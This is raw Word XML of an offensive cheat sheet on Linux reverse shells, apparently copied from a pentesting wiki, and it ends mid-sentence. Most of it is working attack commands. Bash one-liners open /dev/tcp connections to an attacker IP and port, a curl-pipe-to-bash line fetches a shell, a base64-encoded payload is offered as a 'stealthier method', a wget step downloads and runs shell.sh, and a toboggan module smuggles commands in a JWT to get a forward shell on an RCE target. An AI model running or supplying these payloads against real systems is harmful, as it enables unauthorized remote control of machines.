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6EE8" w14:textId="77777777" w:rsidR="004816D2" w:rsidRPr="004816D2" w:rsidRDefault="004816D2" w:rsidP="004816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</w:pPr>
      <w:r w:rsidRPr="004816D2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  <w:t xml:space="preserve">Shells (Linux, Windows, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004816D2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  <w:t>MSFVenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004816D2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:spacing w:val="-6"/>
          <w:kern w:val="36"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20AE16B0" w14:textId="6EF171C1" w:rsidR="00240D72" w:rsidRPr="00827D6A" w:rsidRDefault="00827D6A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">If you have questions about any of these </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t>shells</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> you could check them with</w:t>
      </w:r>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidRPr="00827D6A">
          <w:rPr>
            <w:rStyle w:val="Strong"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
            <w:u w:val="single"/>
            <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
          </w:rPr>
          <w:t>https://explainshell.com/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2F1789B8" w14:textId="77777777" w:rsidR="004816D2" w:rsidRDefault="004816D2"/>
    <w:p w14:paraId="069DF95B" w14:textId="77777777" w:rsidR="004816D2" w:rsidRDefault="004816D2"/>
    <w:p w14:paraId="00B9A240" w14:textId="77777777" w:rsidR="004816D2" w:rsidRDefault="00000000" w:rsidP="004816D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hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="0000FF"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidR="004816D2" w:rsidRPr="00827D6A">
          <w:rPr>
            <w:rStyle w:val="Strong"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:color w:val="0000FF"/>
            <w:spacing w:val="-3"/>
            <w:sz w:val="36"/>
            <w:szCs w:val="36"/>
            <w:u w:val="single"/>
            <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
          </w:rPr>
          <w:t>Shells - Linux</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="22D971A1" w14:textId="77777777" w:rsidR="00827D6A" w:rsidRPr="00827D6A" w:rsidRDefault="00827D6A" w:rsidP="00827D6A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="646CBD4D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Full TTY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA72936" w14:textId="6C8010BE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Once you get a reverse shell</w:t>
      </w:r>
      <w:r w:rsidRPr="00E25AEC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Arial" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="0000FF"/>
          <w:u w:val="single"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t>read th</w:t>
      </w:r>
      <w:r w:rsidR="00E25AEC">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Arial" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="0000FF"/>
          <w:u w:val="single"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t>e below</w:t>
      </w:r>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Arial" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="0000FF"/>
          <w:u w:val="single"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> page to obtain a full TTY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.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E4C838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 xml:space="preserve">Bash | </w:t>
      </w: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sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="18E1F0C0" w14:textId="082635B4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EDDB88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curl https://reverse-shell.sh/1.1.1.1:3000 | bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AFC4D5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bash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&gt;&amp;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/&lt;ATTACKER-IP&gt;/&lt;PORT&gt; 0&gt;&amp;1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C309F1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bash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&gt;&amp;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udp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/127.0.0.1/4242 0&gt;&amp;1 #UDP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4054C31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0&lt;&amp;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196;exec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196&lt;&gt;/dev/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/&lt;ATTACKER-IP&gt;/&lt;PORT&gt;;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&lt;&amp;196 &gt;&amp;196 2&gt;&amp;196</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ECD6C5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exec 5&lt;&gt;/dev/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/&lt;ATTACKER-IP&gt;/&lt;PORT&gt;; while read line 0&lt;&amp;5; do $line 2&gt;&amp;5 &gt;&amp;5;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done</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="79C1889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10A2CE6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#Short and bypass (credits to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Dikline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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50D5C18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)0&gt;/dev/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/10.10.10.10/9091</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="336F208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#after getting the previous shell to get the output to execute</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="493FC0D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exec &gt;&amp;0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD6FF15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Don't forget to check with other shells: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">, ash, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>bsh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>csh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>ksh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>zsh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>pdksh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>tcsh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>, and bash.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C049AD4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Symbol safe shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B47475" w14:textId="01295BDE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0E4843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#If you need a more stable connection do:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B2334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bash -c 'bash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&gt;&amp;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/&lt;ATTACKER-IP&gt;/&lt;PORT&gt; 0&gt;&amp;1'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14656B2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11CD956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#Stealthier method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E8A9F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#B64 encode the shell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like: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echo "bash -c 'bash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&gt;&amp;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/10.8.4.185/4444 0&gt;&amp;1'" | base64 -w0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76CE437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echo bm9odXAgYmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC44LjQuMTg1LzQ0NDQgMD4mMScK | base64 -d | bash 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62005140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Shell explanation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4139F6AA" w14:textId="77777777" w:rsidR="00827D6A" w:rsidRPr="00827D6A" w:rsidRDefault="00827D6A" w:rsidP="00827D6A">
      <w:pPr>
        <w:pStyle w:val="max-w-3xl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bash -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>: This part of the command starts an interactive (</w:t>
      </w:r>
      <w:r w:rsidRPr="00827D6A"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-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00827D6A"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Fonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>) Bash shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67B8BF9B" w14:textId="77777777" w:rsidR="00827D6A" w:rsidRPr="00827D6A" w:rsidRDefault="00827D6A" w:rsidP="00827D6A">
      <w:pPr>
        <w:pStyle w:val="max-w-3xl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&gt;&amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">: This part of the command is a shorthand notation for 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redirecting both standard output</w:t>
      </w:r>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00827D6A"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stdout</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">) and 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standard error</w:t>
      </w:r>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidRPr="00827D6A"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stderr</w:t>
      </w:r>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">) to the 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same destination</w:t>
      </w:r>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="359B9412" w14:textId="77777777" w:rsidR="00827D6A" w:rsidRPr="00827D6A" w:rsidRDefault="00827D6A" w:rsidP="00827D6A">
      <w:pPr>
        <w:pStyle w:val="max-w-3xl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lastRenderedPageBreak/>
        <w:t>/dev/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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/&lt;ATTACKER-IP&gt;/&lt;PORT&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">: This is a special file that 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represents a TCP connection to the specified IP address and port</w:t>
      </w:r>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C8C4C8F" w14:textId="77777777" w:rsidR="00827D6A" w:rsidRPr="00827D6A" w:rsidRDefault="00827D6A" w:rsidP="00827D6A">
      <w:pPr>
        <w:pStyle w:val="max-w-3xl"/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By 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redirecting the output and error streams to this file</w:t>
      </w:r>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>, the command effectively sends the output of the interactive shell session to the attacker's machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D61D182" w14:textId="77777777" w:rsidR="00827D6A" w:rsidRPr="00827D6A" w:rsidRDefault="00827D6A" w:rsidP="00827D6A">
      <w:pPr>
        <w:pStyle w:val="max-w-3xl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0&gt;&amp;1</w:t>
      </w:r>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">: This part of the command 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redirects standard input (</w:t>
      </w:r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stdin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) to the same destination as standard output (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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stdout</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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)</w:t>
      </w:r>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CAF2D9C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 xml:space="preserve">Create in file and </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>execute</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="77759B27" w14:textId="2694ED45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5CE0D1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echo -e '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#!/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bin/bash\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nbash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&gt;&amp;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/1&lt;ATTACKER-IP&gt;/&lt;PORT&gt; 0&gt;&amp;1' &gt;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/sh.sh; bash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/sh.sh;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD8469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wget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http://&lt;IP attacker&gt;/shell.sh -P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chmod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+x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/shell.sh; /tmp/shell.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="101869EB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Forward Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A4213C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When dealing with a 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Remote Code Execution (RCE)</w:t>
      </w:r>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> vulnerability within a Linux-based web application, achieving a reverse shell might be obstructed by network </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>defenses</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> like iptables rules or intricate packet filtering mechanisms. In such constrained environments, an alternative approach involves establishing a PTY (Pseudo Terminal) shell to interact with the compromised system more effectively.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A9BAB8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A recommended tool for this purpose is </w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidRPr="00827D6A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
          </w:rPr>
          <w:t>toboggan</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>, which simplifies interaction with the target environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="610F29E3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To utilize toboggan effectively, create a Python module tailored to the RCE context of your target system. For example, a module named </w:t>
      </w:r>
      <w:r w:rsidRPr="00827D6A"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nix.py</w:t>
      </w:r>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> could be structured as follows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC6C1E2" w14:textId="73B315C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D08BB7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import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jwt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="030C9F3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import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httpx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="1644086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4B03E71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def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execute(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command: str, timeout: float = None) -&gt; str:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC5FFC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# Generate JWT Token embedding the command, using space-to-${IFS} substitution for command execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F250A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token =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jwt.encode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</w:p>
    <w:p w14:paraId="000C1A8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{"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":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command.replace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 ", "${IFS}")}, "!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rLsQaHs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#*&amp;L7%F24zEUnWZ8AeMu7^", algorithm="HS256"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B61EE4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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26FE053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7A1AC8B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response =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httpx.get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</w:p>
    <w:p w14:paraId="7094494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url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="https://vulnerable.io:3200",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03CD5AB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headers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={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"Authorization":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f"Bearer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{token}"},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="781D80B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timeout=timeout,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE081D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# ||BURP||</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E2E5E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verify=False,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C9AE15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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC32A8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564292A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 xml:space="preserve">    # Check if the request was successful</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5300A07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response.raise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_for_status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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A194EA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17EBFAF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return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response.text</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5307D7CE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And then, you can run:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EEEE043" w14:textId="629C3449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D1E4FC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toboggan -m nix.py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</w:p>
    <w:p w14:paraId="6EE7F67C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To directly leverage an </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>interractive</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> shell. You can add </w:t>
      </w:r>
      <w:r w:rsidRPr="00827D6A"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-b</w:t>
      </w:r>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Burpsuite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> integration and remove the </w:t>
      </w:r>
      <w:r w:rsidRPr="00827D6A"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-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00827D6A"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Fonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> for a more basic </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>rce</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> wrapper.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E7E7C9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Another possibility </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>consist</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> using the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="var(--font-mono)" w:hAnsi="var(--font-mono)"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t>IppSec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> forward shell implementation </w:t>
      </w:r>
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidRPr="00827D6A">
          <w:rPr>
            <w:rStyle w:val="Strong"/>
            <w:rFonts w:ascii="Arial" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="0000FF"/>
            <w:u w:val="single"/>
            <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
          </w:rPr>
          <w:t>https://github.com/IppSec/forward-shell</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B3E3DD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You just need to modify:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A394098" w14:textId="77777777" w:rsidR="00827D6A" w:rsidRPr="00827D6A" w:rsidRDefault="00827D6A" w:rsidP="00827D6A">
      <w:pPr>
        <w:pStyle w:val="max-w-3x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>The URL of the vulnerable host</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="116FE09D" w14:textId="77777777" w:rsidR="00827D6A" w:rsidRPr="00827D6A" w:rsidRDefault="00827D6A" w:rsidP="00827D6A">
      <w:pPr>
        <w:pStyle w:val="max-w-3x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>The prefix and suffix of your payload (if any)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C08A5E7" w14:textId="77777777" w:rsidR="00827D6A" w:rsidRPr="00827D6A" w:rsidRDefault="00827D6A" w:rsidP="00827D6A">
      <w:pPr>
        <w:pStyle w:val="max-w-3x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>The way the payload is sent (headers? data? extra info?)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D1519B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Then, you can just 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send commands</w:t>
      </w:r>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> or even 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use the </w:t>
      </w:r>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
